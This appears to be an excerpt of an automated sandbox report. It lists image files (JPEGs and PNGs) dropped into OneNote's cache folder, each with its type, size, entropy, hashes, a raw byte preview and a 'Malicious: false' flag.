Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................U..........................................>...............................8H........59...$%&7F#'Ddf.....................................>.................................58EG........!#124$%&ACFbcde............?...n.p..v..a.~.._.>......#....8.....w.G...&.W...i...%6m..K;...4."...=..?.~......P..O...j.l..AW.jo..,..=d.h.ta..../.."...z\|).J.......Ww._..<Wp.3+8...-5...G:..2.D..I>o..K.F;-.....#...`...6..T...M.....OOgV~..5...np...P..TYr...........b..{r.2.9..].DA.%C....=.v.z......CK."..R..l..y}.i..;.{....JzS.....~.?..Z....=c.h~..p.@(@..G.....O.]...Hsd.xf".V]..S"..w...4e>....3U.7..\|M.x...\|\......FD./.cIe.;.bId..+=...w.......[.k>....}.u...j.xZ.....Q4..+.....B....1O~\......I..h....LaXJ%&.w.<C...n/`.W..U.W.U.}~...}>..^.0.J.....@....LN.b.......5W...m].Eu...:....G..:4.=4ixx..@_0=.mab.T.U.....w..~.V.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003D.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3
Category:	dropped
Size (bytes):	140755
Entropy (8bit):	7.9013245181576695
Encrypted:	false
SSDEEP:	3072:i/aDiblRsFcOco8dofE5Zx1+NQI8Wh9aiOe5NTO:mnbM+TxaAi98W3aiOwTO
MD5:	CC087700C07D674D69AFDFDA0FA9825C
SHA1:	F11113DF69DACDB255C6CBCFB29C1D1CCE40B346
SHA-256:	A7FA7F092EFF43030A56342C39A765F8D5CC48C7DB815DDFC8C1E5EC40117FAE
SHA-512:	843202D975EFA91E73287052A893584B6E5AE601F91612B56539AA2F73D1AD3F997FCAD1E711E0F483A2E91D46D9643D0B026B43F4E94116A5D2FB6551536034
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:15:20.............................\.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.......J...\O.,......../$..........OE.m.o......T....Z..l.g.-....m.?...Y....3......"....].j.X.k.S.k.....4..R....{....?F.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003F.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3
Category:	dropped
Size (bytes):	129887
Entropy (8bit):	7.8877849553452695
Encrypted:	false
SSDEEP:	3072:QS1x1rXglsteJ79wHi4vNQR5yBlUdOSILe9hSj9jeWMPjdlOJ:vvglst1HiwWR5yBA2LeS9jd1
MD5:	737E96E41D79D3BDACE7AB4F8CBF6274
SHA1:	E6202A41A4F86B27D9EBCAEF7670B16C0ED67CF2
SHA-256:	7966F3D8A2D61ECB49A35E163781858E052C0B122A18A1238AFE27B57E2850E8
SHA-512:	D398C8521DB2FB3F8456FE792CF37472F3B851DD7298DB20E2DB79144F8E846D051878E77E5EF5D00E6840EDB90C6E2D97935BC1023A15FC45038CCE731E9895
Malicious:	false
Preview:	......JFIF.....H.H.....iExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:13:06.............................:.......................................................&.(.................................3.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................u.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...W..I:......a....Aa ...w.T.M.v.........3x.......8Y....$.."-..m.I.0~sxB[@..=...:..\.Y?....@O.L;9i..U....?.5">+9.s\Z..vN

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003H.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	84941
Entropy (8bit):	7.966881945560921
Encrypted:	false
SSDEEP:	1536:X3sWfhTVd+xu6rA6SOONM0/YFXnviDwoPCaNSm+z/ze/fWNj7GfigeKyCGzw+QKW:nsOhdDJOwY1voPCaom+z/zeHAfGihCG8
MD5:	CB84C108A76C2AFFCAC2551A3C1EAD56
SHA1:	8BB7C2A12B056C1ED12EBBAE5BC9F60CCE880FFE
SHA-256:	139BB0E79F89C3DDEF79B1716A5FBAB4C07DF5785FB3CDF6B4EEDDBF6C078452
SHA-512:	6EF85144E9A7ACD0FF2E52A5FF42093153EFB69127B1C8549EEBC49B6CC196A46B65EE39A2CAD0206F6A41476D8B5B35D29EAC9942B8F84972B32E14CAFEED27
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d....................................................................................!.1A.Qa..q...........".2..BRbr#.T.3C....S$.cs.D..4%5......................!1A..Qaq."2..BR....3...b#.r.C4.............?.......m.q..'O.....r......_.1....8h....?.....O]~..k......GO...''._...!....o........''..g..H?k.......1...?.....z......>...+0..................GO...''._.........}.O.Z\|.L?...........?.........[~t.......}......NO.....v.......J.......?..g..H?k......GO,m..r}o.z.....}......dC.9?..g..H_..........?.....O]~...m...C?.z..f....W.=u.B..m..C.-?.a.....3._.?.......o....np.M....g..H_............9?..g..H...../..kO...''._...!~...o.....0.M....g..H.........../......O]~.~...o.......7..+.... ..l?.}........&....3._./....?.........W.=u.C..m..C.+?..o.W.=u.A.^.O....:......_.........}..t

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003J.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 623, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1569
Entropy (8bit):	7.583832946136897
Encrypted:	false
SSDEEP:	24:KArPoy/sSfmBL0EGEsRgeTLLXFnViAAEslVorlP0i8OmO57EnGAkYelBKMN:9oQPTgeL5ViAe8rQs7HAkrlc+
MD5:	07DB3F43DE7C1392C67802E74707DAA6
SHA1:	C173ADB1999065C5E1E6DBEF934B4D4D7AF0CC23
SHA-256:	51E05999A1C9F17DF28CB474E57DD8E64BDAB824874A532C20A23766A01F8967
SHA-512:	E509255519D4E521E82332FF418DD5A6BBBC8476399A0D9C3D81542C1CABA535B2D79E5BC90F73F9EE8468643302137671934ABD600FC696F16161C91FEAC111
Malicious:	false
Preview:	.PNG........IHDR...(...o.....>.c.....PLTE................................................................................................................................................................................................a.o.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.Y.. ..........}%.../].`<..y....V...m.....<....)..;Ki..'9...2.:.c...t..V..d.t;-y.Z.=K>B.."{Lj.~G..\|..ENC.!Sw,....";.p..g....E.B..S.-...k..P."..E......l[./D.-.....Q+.G<>.+..b...#..y(...{a.M..J...<....v.W..F.qm.`.....(.mk.nX....l.Px8.0\Z....7G...$*.....&..Z.VJ.~......J.2\|...2H..../...=.)q....ZT" .,%..h.p....Z$.!........r...Hh.f. ....P .d..1d....2.3h....;.A.... ....d..g4...A..^.....2.ew..."h...y/..j.h..B.......%.2.%..{r...+dG.=9h....P1...A...c...^h.]Q0.8x....q .!3....ZW"Z.!3...G.vC.GG..".&..X!3.\|xB..V.P!.+zS..NX!3.....Nh.y(.Z.1.h..B...Z+....l8Xcu.B...K...@U..@Q...mB...x...&L C....mB.....@kC...Y.,.... ..e\F.B..........y..e\..:$(....Z.a...yn...f..z.~Q.{o...].ln.r....^.@.{..c.7..{...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003L.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40035
Entropy (8bit):	7.360144465307449
Encrypted:	false
SSDEEP:	768:MQhziQo1RKGlyyzYjlxuxwRUj/BN837xRmwH2uDTCn8qXFQziN:ThzrSzalg6O563l4uTC8q1Ig
MD5:	B1DDD365D87605F96D72042CB56572F6
SHA1:	ADF71DAD1A62B8A58A657C2EDBDD665A19EB846B
SHA-256:	06E09DE80C3F32254DA4FE6B2CBAD7C05EF144DD54B8C65745E195BBF7317A2E
SHA-512:	9C686092CC9524F34EA6CEC9AAE936A6225BCC54DE38DE1786EBA8F532959A80FF885E8664A09E4C318D7CA4B278E807D3D1F135BE55F30979B844FF5EC9699A
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!1....AQ.aq.....".3.5...2B#s.$%..Rr.CS4&6...bE'7.c.DTtU...d.eu...VFfv.Gw.....Wg......................!...1AQaq........"2..4..Rbr#3$...B.s5Cc.S%.D............?..^.f....R.N{.{f.....O.r.V.;U..~...U.(..>M._.yI.{8,..^.t...s`...j.O..U5t.&&..h.G.6Da.;.....J.......E..QD...C...}..N...tR.....~..].J:.V$..r......]...W......4.[.)6..Y_.....4...........m._'HR.a......]U=.....n...0.W..]..K..){.+...w...f...<\|..1/.\|.....b..-..y....]U#Ctn.7m.._.\|..2I;\|....tM....q.q.}.N)....'...9&...nR...R..}.........m._.LZ}u.../K....9.~..?.{....V.#..dx.Zk.:=..:.j].....E#....E~w%....J..[S..[......gr...vb.r]..<..ut..i...[P.w....:..Gkn>......#..m...9km`......t).up.....w....VOR.{&.nQI..}...wD.7Ey#n....MO.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003N.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3
Category:	dropped
Size (bytes):	242903
Entropy (8bit):	7.944495275553473
Encrypted:	false
SSDEEP:	6144:YVxOYlZX2kCWfYoFMXC/sBFC9r+4iEGM4rrcPoWmwkU6FJ:+OwZ2kbFMC/L99ifvokU6/
MD5:	C594A4AA7234EF91E6C2714CFE1410F1
SHA1:	C0F720D4CE3196852814D0B7347F0CAA0C6FD526
SHA-256:	10C833E47BE1C8496F949A6B059C2D79212A4DD66BDE62116EA337FA4FE0B654
SHA-512:	7313F6545A334F9E2DE5430B2DB5C419C4C8A40E075338DAFCD74970BCC6309786946E5DFB57531612BF4C6269495655706D920FD99922FDACFF9796710DA9C0
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:10:32.............................R.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...v&.F;-v;}FH..Z...N..)Y.......h;C....G.0W..ww...MI..Z+..\.........c..4.1.~.Yo.Y6.&. q...............l.A#.~s?yYg..7ky...r

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003P.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3
Category:	dropped
Size (bytes):	70028
Entropy (8bit):	7.742089280742944
Encrypted:	false
SSDEEP:	1536:ub4bgbB7g9cKCmSzaNF0jAdAzQKTEFBQqUp/i0yG1pidLHTVX:ub4bIB7Qg2OjbzjgWp/i0yGCZx
MD5:	EC7811912ACA47F6AEB912469761D70D
SHA1:	C759BC2D908705D599B03BDB366C951B11F99A4E
SHA-256:	FBB4573E3BEE1B337077691BEBAE15D6FAC52432405D31396D526D7694A8283D
SHA-512:	881828150993A8C56E36CDA2051D89C1F6E0322643902C9506392C163E8734A2933A46486F40E5BC8C8D0164E180605E52620EF22FE14540AEA787A38B22E98E
Malicious:	false
Preview:	......JFIF.....H.H.....7Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:12:29.............................V.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................}.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....H.yM..? .Z.. .^.x..p.8.A...K.... .\{..)..y....t..=.^y)..v.@.W>. .h.. ..p.:.\)(.$....$.I).....!....E..Z.....&.5.).

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003R.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
Category:	dropped
Size (bytes):	24268
Entropy (8bit):	6.946124661664625
Encrypted:	false
SSDEEP:	384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
MD5:	3CD906D179F59DDFA112510C7E996351
SHA1:	48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
SHA-256:	1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
SHA-512:	2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003T.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	47294
Entropy (8bit):	7.497888607667405
Encrypted:	false
SSDEEP:	768:aQ10VrIBdBvDpQrQ7P9/FUOLG2vTSeG9lkCsMKzXeMBk3CBp:aC0JIBL+QsOLG2+ZAC1KqM2I
MD5:	7A450E086AD14BA7D89BA5DB3D3AE6C7
SHA1:	E7AEAFCFCE476390E18C19456BDF6529D863D518
SHA-256:	BDD997068701ED3A00A224EB694B003C01AC69B857FE7B4147D6C34875B1632B
SHA-512:	9B6D50A6CDB6081DA107A2CDDB1BD2811A5764994C8E3F67D56CA81084BE0D068C27435154E867199F38688EA65E8DE02A56DCAC47D0F5E55F0FBB6598814938
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..A..Qa"..q..2.......B#...R%.r...$&b...3Ss.4dU6F.cE..'GC..t..5eufW......................!.1..AQ.aq..".....2BR......r.#3.d...b..Ccs.t......$4T...SD%5Ue&Vf............?..M.7(..).:.a.q.......>..[:O...afQ.uCO..U.....go.l..p..YqVklQ.{i.w&.]Z.\+JQw._.n.'.h..,.bj..X.].k&.Q.>gU..f...1\|....[...jQ.%Zb.......t............V..j.6....Vj..i.....?...IY.P.....$.j........[l.....S.4.J9.U\.......7I..[..=N5....xW..../...=?n....uG.D..S.>...8..3........n.S....]k.*...4.>.R.o..{..l.H.#.^....<amG.m&.......,....wDY.W.m.X....We.IR.Nu...y..Z.l.._S.mr.m...y.]m.R.MT...6.5.5}.K..#%..k].7.Y.q]...%.r.7.R^jR..z.K.T[t.a..d.)glW.r.v,.`....O..^..o:.Uc.\..D....f..D......yt.Q...Y.....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003V.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 60 x 336, 4-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	347
Entropy (8bit):	6.85024426015615
Encrypted:	false
SSDEEP:	6:6v/lhPtnlx/QulkWNY2V18A6Akp7eee1VDjMHCyLezyKUX5Gp:6v/7RrIubiA6AkpNhiyKe+
MD5:	78762C169F8B104CB57DFF5A1669D2DF
SHA1:	9638B71B584CD636834016A635ABF8D9C0887711
SHA-256:	E64FDCD0B108737D8B8F7B677029F924031D6BBAA50585D9C3DEF7C7E92ECAF2
SHA-512:	5ED899AAF73B72DEC32E171FFA112382667D5BF3FBA98C92E313E66C0A6975EA97068F4CD32B62283F18DBD5345C11E3610F7EEAC2F2DE71FC44593180B9CEAC
Malicious:	false
Preview:	.PNG........IHDR...<...P.............PLTE......................=l......bKGD....H....cmPPJCmp0712....Om......IDATh......@..aI...B..C..l...^.%.`....>.]..\|0.....a...hb...0......q.......p"....;...K..x=...p...y.yy~J....\|...\.......y..X.......'...>1...Ky..f....&........N`..f0..b...3.......`Z.3..3.....o.......4.&........SV...4.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000041.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 617, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	827
Entropy (8bit):	7.23139555596658
Encrypted:	false
SSDEEP:	12:6v/7Hs2NwBW1mtjeSfaTHHy05riYUtr8y8PQvPYzzg979Reip0QPqc:oOsotazy4rStr8y8PQIzWea0Qv
MD5:	3E675D61F588462FB452342B14BCF9C0
SHA1:	86B62019BC3C5BE48B654256B5D10293FC8C842A
SHA-256:	639EADAD468B6B32B9124B1F4395A8DA3027FF7258D102173BA070AE2ED541AE
SHA-512:	E6EA855B642ED36FA82F8E469A826DC57EB0C36E307045FF8D166F67AF9242C87840833BE31FBE4706DC54100E999D6A3D3A78D0633A3114735818874AD34758
Malicious:	false
Preview:	.PNG........IHDR...(...i..........`PLTE...................................................................................................bKGD....H....cmPPJCmp0712....H.s....qIDATx^...0.Cg.;......@j..2c.=~KP.[H~..@..8...?U.g.n.a=.=.).....3..u^(.....L....5..........8.}..T.f.n.a=.=.).....3..u^(.....L..r....s..8.....W]....,..9..G?.a..`c.z...E.p...)Y.P.....#....@9.7].....,..9..G?.a..`c.z...E.p...)Y.P...`b....0.b.+~{.Pu...1..<..0._.l.@O.y.(...V3%..J....s... .(g.+.qyWu...1..<..0._.l.@O.y.(...V3%...%R.L.Q..x..R.<t.o......7.............:/.E..j.da@i..`b..Z......u.>.?...7.............:/.E..j.da@.Dj..9.W....s. .....:.......L...">w..7... .....:..."...L..."..a....D..Ya.l....E.{.@&.\|.._...7..D..Ya.l.....{.@&.\|....0.J.."z.0s..s....=g ..>........"z.0s..s....=g ..>..l..1...y..g......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000043.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 600, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	4410
Entropy (8bit):	7.857636973514526
Encrypted:	false
SSDEEP:	96:E/pQuIhKZ7u06dICH3AroiTe8DGTl55poBUmLNjpH7MvDHjfm:MpdZtPbknnRPpkLNVMvu
MD5:	2494381A1ACDC83843B912CFCDE5643B
SHA1:	98F9D1CC140076D1AE5A9EA19F47658FD5DF0D66
SHA-256:	5EEBE803E434A845D19BC600DF3C75E98BB69BD0DE473CEEC410D1B3A9154E28
SHA-512:	0E64CC3723DC41D94910F7ADFB6A0DFB5049350FD15A873695614E4A89ABD78B166BA4E9C8CB95E275FB56981539DECD2A7F28FBC25E80DD5E2DEA8077CC9489
Malicious:	false
Preview:	.PNG........IHDR...2...X.......E.....PLTE...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................B..(....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.].\TU.?3"...(..L........q.Q...H.*j......W..Xd.ie.f..%.XT...em..m.m.vkik...>.}..}\|..{'.U..~......}....s.............,CVu.x.:C..5...;.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000045.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	136726
Entropy (8bit):	7.973487854173386
Encrypted:	false
SSDEEP:	3072:SIXmy5Tl704vW2ZKkvV8UU0ZWUF0BJwySIdgz816YzDc1+opecYPn:Sny5Tl704fZFV8UU6LGXwyS4xohpQPn
MD5:	4A2472AC2A9434E35701362D1C56EDDF
SHA1:	16FA2EA2D2808D75445896E03B67A93000EEDDD8
SHA-256:	505F731CB7707EFAB2EB06685B392DC7E59265A40B55AAE43E5DC15C0A86CBA4
SHA-512:	5E28D8FB2AC62ED270968072A30013334461F7CAE96058AF9EAA6E10912989DC47112D2133892BF61F7A516B77C6FF71BA2A000B750A9F95C787E538B09595C2
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQaq".....2B....R#..b3...r...C$...X.....Sc...9.%'.(Hs4Dgw..T..5GW.x.)......................!.1..AQa"2.q.......B..#c........b6.Rr.3s$.&..S...C4.%5............?.........(......(......(......(......(......(......(......(.G/.GE&...)..P.x..B.({i2Y;.z?G...Yfc.)H..^....#.....}3..Sc^.H..+...M.a.P.....GS.....H_.3..<....1f........1.<.\..nn-..s.s.\9Y....=.......S.0.......N..cA..Io..r.3..........ay.....K.....,.;9..Q......xO.Fa.2..>........{4k.....\|....?U....3.8..._/3....#.. t.y......yY.......e.<........#.....B.....Z.%.Y..S.ye.W4...l.......X...%.@y}>....l.yi..D..W......L..._D.Q....)...E....n.%...*..K.4#.8`..I....h..h.o..I......-...hB...3..u.(5..........n...,.@....a.t.9.....@.s.>.&...@

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000047.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 77 x 627, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	5136
Entropy (8bit):	7.622045262603241
Encrypted:	false
SSDEEP:	96:djzuNKb3XHco17p2wolIxIx7lpskdsC/ddWNKeabJbMojpxLDTu1:VzuNKb397pwlIxKp7qs3bJb5FBTw
MD5:	FA38AFA965141EA3F17863EE8DCCDE61
SHA1:	2B4611E651AF7549C1AA73932B1136B561A7602F
SHA-256:	E1CB1A0EC9BE62D5445C73AA84DF38234002A7E164EE830C9DF24997802CB5D2
SHA-512:	A372674F5CA343321BA9C413D346070709F7685706C9C6C3DC7F61846B59253A5E6FE800DBA10AE870FD3887439B2AA106FBBB51751E92A163938A4393C43E28
Malicious:	false
Preview:	.PNG........IHDR...M...s.....}8nv....PLTE.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................z`.....tRNS...................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000049.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	52945
Entropy (8bit):	7.6490972666456765
Encrypted:	false
SSDEEP:	768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
MD5:	AD003F032F32FAC4672D4CE237FA5C5B
SHA1:	AE234931B452F0D649D91291763B919CF350EA49
SHA-256:	ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
SHA-512:	ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k\|...S..d.4.>.RW5z.$.i.)V.O....>o...c..&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N..\|.4...80.#..e....t.J..ZQ.x\|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......\|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G\|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004B.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	79656
Entropy (8bit):	7.966459570826366
Encrypted:	false
SSDEEP:	1536:2kuUliOeU4os8ii3nF3Hxro/qxXD9u/kjYgMZqoEs6ZUldm:3uUsOXYIAixR2k7WAZV
MD5:	39FF3ACAE544EAC172B1269F825B9E9F
SHA1:	2D40DE8D90BD21D56314D3F99CEF4FBAE3712C0F
SHA-256:	70475431CCA3C91A4EFA3B8F04864371D2D3A45696674A1A0562FE9CD8DB287C
SHA-512:	3B9F3B32696AB7779864E83DC0C45960114A130BEE0CF4D0643DE57FF952171E5D775AA49141EE31A28A9B5D052B26EB421F26EA736D7EF4B3A7EC812CA411CB
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1A.Qa"..q.....2#..BRb..r3$.Cc..Ss.4...D%5&..T...'7....................!1.A..Q.aq..."2.....B3.r.#..R...bc$4..D.s%............?..Y..T.o.\......=.a..j..'^..s..[../........Y.......<...(..4.....7y..Ln.[9.cK.ilN...u@$.V.9.V?3..s.KL.z..w.jW.C.............@.~+.o?o8...k....,.m..9.".....q.....d....z.W...q...~...'..e..>..f#...S.....F....pU.......7..N.vfK......S..G.#.....}.c.........RXt.bq1.`.....[+8\..N..:......}.....r..........')......Na...&...m......c...a4_%d.............co..0.n.L.Q..E.Lt..y.\|..F..4.i(>.._..\.eNL8..?z9I:hLgC.@.p....g.t......'.I!d..?1f..R..........\|..4.wJ..%g..~0bt.....*...v.......O...:.~.>~..o.x...9.@>...s.&.E.0/G.c..t.<..F.t.A.z. ......;.........Gp.P

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004D.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40884
Entropy (8bit):	7.545929039957292
Encrypted:	false
SSDEEP:	768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
